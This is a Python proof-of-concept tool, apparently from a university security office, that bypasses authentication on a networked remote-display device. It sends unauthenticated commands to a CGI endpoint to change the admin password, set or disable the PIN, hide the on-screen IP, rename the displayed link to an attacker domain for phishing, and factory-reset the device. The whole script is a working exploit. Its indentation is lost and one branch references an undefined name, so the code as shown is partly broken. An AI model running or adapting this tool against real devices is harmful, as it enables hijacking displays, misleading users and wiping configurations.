#!/usr/bin/env python
## POC remote display authentication bypass tool
## Carnegie Mellon Univeristy
## Information Security Office
## Author: Brian W. Gray
## Initial Creation Date: 07.02.2014
## Last updated: 07.07.2014
version="%prog 0.03a"
import urllib
import urllib2
try:
import xml.etree.cElementTree as ET # Load cElemenTree for performance gain
except ImportError:
import xml.etree.ElementTree as ET # Fail back to ElementTree if cElementTree is not available
from optparse import OptionParser
usage = "usage: %prog -i [address] -a [action] -o [option input]"
parser = OptionParser(usage=usage, version=version)
parser.add_option("-i", "--ip", dest="selHost",
help="Provide the device address [192.168.100.10]", metavar="value")
parser.add_option("-a", "--action", dest="selAction",
help="Select an action [password, pin, setpin, showip, setlink, status, factoryreset]", metavar="value")
parser.add_option("-o", "--option", dest="selOption",
help="Provide an option to the Action [password [yourPassword], pin [enable / disable], setpin [0000], showip [enable / disable], setlink [hostname], status [query], factoryreset [raze]]", metavar="value")
(options, args) = parser.parse_args()
if not options.selHost:
parser.error('A device address was not provided. Use -h for help')
if not options.selAction:
parser.error('An action selection was not provided. Use -h for help')
if not options.selOption:
parser.error('An option was not provided. Use -h for help')
selHost = options.selHost
selAction = options.selAction
selOption = options.selOption
optionValue = "0"
# Set device return_test.cgi URI.
url = 'http://' + selHost + '/cgi-bin/return_test.cgi'
# Set a new password
if selAction == "password":
buildCommand = "Pwd_admin"+selOption+""
# Enable or Disable pins
elif selAction == "pin":
if selOption == "enable":
optionValue = "1"
elif selOption == "disable":
optionValue = "0"
else:
print('\r\nYou have provided an Unknown option for configuring pins options are enable or disable defaulting to disable')
optionValue = "0"
buildCommand = "LoginCodeType"+optionValue+""
# Set a static pin for the on screen display.
elif selAction == "setpin":
if int(selOption) >= 0 and int(selOption) < 10000 :
print ('\r\nSetting pin to ' + selOption)
else:
print('\r\nYou have provided an invalid option and the pin has defaulted to 0000')
selOption = "0000"
buildCommand = "LoginCodeType2videooutput4Resolution4LOGIN"+selOption+"UNDER_SCAN0UNDER_SCX00UNDER_SCY00UNDER_SCX165535UNDER_SCY165535"
# Enable or Disable the on screen display of the ip address.
elif selAction == "showip":
if selOption == "enable":
optionValue = "1"
elif selOption == "disable":
optionValue = "0"
else:
print('\r\nYou have provided an Unknown option for showip options are enable or disable defaulting to disable')
optionValue = "0"
buildCommand = "OSDIPOnOff"+optionValue+""
# Rename the host to display a custom link on screen. ex. (-a setlink -o malicious.collectingyour.info) Combine with (-a showip -o disable) actions.
elif selAction == "setlink":
buildCommand = "DOMAIN_NAME"+selOption+"WL_ESSID"+selOption+"ControlSystemId5"
# Query device status for debugging.
elif selAction == "status":
if selOption == "query":
buildCommand = ""
else:
print('\r\n -o query is being assumed to request device status')
selOption = query
# Reset the device to factory defaults.
elif selAction == "factoryreset":
if selOption == "raze":
buildCommand = "r99"
else:
print('\r\nYou must supply -o raze to reset this device to factory settings')
exit()
else:
print('\r\nYou have selected an Unknown Action')
exit()
# Build and send HTML POST
values = {}
values['command'] = buildCommand
data = urllib.urlencode(values)
headers = { 'User-Agent' : 'User-Agent: CMU/2.2 CFNetwork/672.0.8 Darwin/14.0.0' }
req = urllib2.Request(url, data, headers)
response = urllib2.urlopen(req)
html = response.read()
# Parse and display Boa response
root = ET.fromstring(html)
print ("\r\nBoa service response: \r\n")
# for node in root.findall(".//*"):
for node in root.iter():
print node.tag, ":", node.text
print ("\r\n")
exit()